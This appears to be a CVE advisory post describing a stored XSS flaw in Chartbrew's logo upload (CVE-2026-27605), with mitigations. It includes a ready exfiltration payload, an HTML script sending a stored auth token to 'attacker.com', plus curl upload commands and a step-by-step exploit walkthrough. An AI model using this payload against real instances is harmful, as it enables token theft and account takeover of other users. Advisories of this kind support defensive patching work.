Chartbrew, Stored Cross-Site Scripting (XSS), CVE-2026-27605 (MEDIUM)

Listen to this Post

Prior to version 4.8.4, Chartbrew contained a vulnerability in its project logo upload functionality. The application failed to validate the content or MIME type of uploaded files, relying solely on the file extension provided by the user. This allows an attacker to upload a malicious HTML file containing JavaScript code instead of a legitimate image. The file is saved to the server’s `uploads/` directory and is served statically. When a victim (such as another user or an administrator) views a page that loads this logo, the embedded JavaScript executes in their browser. Because Chartbrew stores authentication tokens in the browser’s localStorage, the malicious script can access and exfiltrate these tokens, leading to direct account takeover .
Platform: Chartbrew
Version: < 4.8.4
Vulnerability : Stored XSS
Severity: MEDIUM 6.3
date: 2026-03-06

Prediction: Patch v4.8.4

What Undercode Say:

Analytics

The vulnerability stems from two primary weaknesses: CWE-434 (Unrestricted Upload of File with Dangerous Type) and CWE-79 (Cross-site Scripting) . The attack vector is network-based, requires low complexity, and necessitates user interaction (viewing the malicious file) . The confidentiality impact is low (token theft), but the integrity impact is high (account takeover) .

Bash Commands & Code

1. Check the current version of Chartbrew (if self-hosted)
Look for the version number in package.json
cat package.json | grep version
2. Simulate an upload of a malicious file using curl
Create a malicious HTML file
echo '<html><body><script>fetch("https://attacker.com/steal?cookie=" + localStorage.getItem("chartbrew_token"));</script></body></html>' > evil.html
Upload the file to a target Chartbrew instance (assuming valid session)
Note: The endpoint and field name are illustrative; replace with actual values from network tab
curl -X POST -F "[email protected]" -b "session_cookie=YOUR_SESSION" http://target-chartbrew.com/api/projects/1/upload-logo
3. Verify the file was uploaded and is accessible
This endpoint will serve the static file
curl -v http://target-chartbrew.com/uploads/evil.html
4. Check if the patch has been applied (in v4.8.4)
Look for new validation logic in the commit history
git log -S "file type" -- src/routes/api/project.js

How Exploit:

  1. Craft Payload: Create an HTML file containing JavaScript to steal `localStorage` data (e.g., localStorage.getItem('chartbrew_token')) and send it to an external server.
  2. Upload File: Authenticate to Chartbrew, navigate to a project’s settings, and upload the malicious HTML file as the project logo.
  3. Trigger Execution: The attacker tricks an administrator or another user into visiting the project page where the logo is displayed. The server serves the HTML file, and the browser executes the JavaScript.
  4. Account Takeover: The attacker receives the authentication token and uses it to impersonate the victim, gaining full control of their account .

Protection from this CVE

Immediate Patching: Upgrade to Chartbrew version 4.8.4 or later immediately .
File Validation: Implement strict validation on file uploads. Check the file’s MIME type using magic bytes (e.g., file --mime-type), not just the extension. Whitelist allowed file types.
Content Security Policy: Implement a strong Content-Security-Policy (CSP) header to prevent execution of inline scripts and restrict where scripts can be loaded from.
Secure Storage: Avoid storing sensitive tokens in localStorage; use HTTP-only, Secure cookies for session management where possible.

Impact

Successful exploitation allows an attacker to perform a Stored Cross-Site Scripting (XSS) attack. By stealing authentication tokens from localStorage, the attacker can bypass authentication and perform a complete account takeover, gaining access to all connected databases and APIs configured within the victim’s Chartbrew instance .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top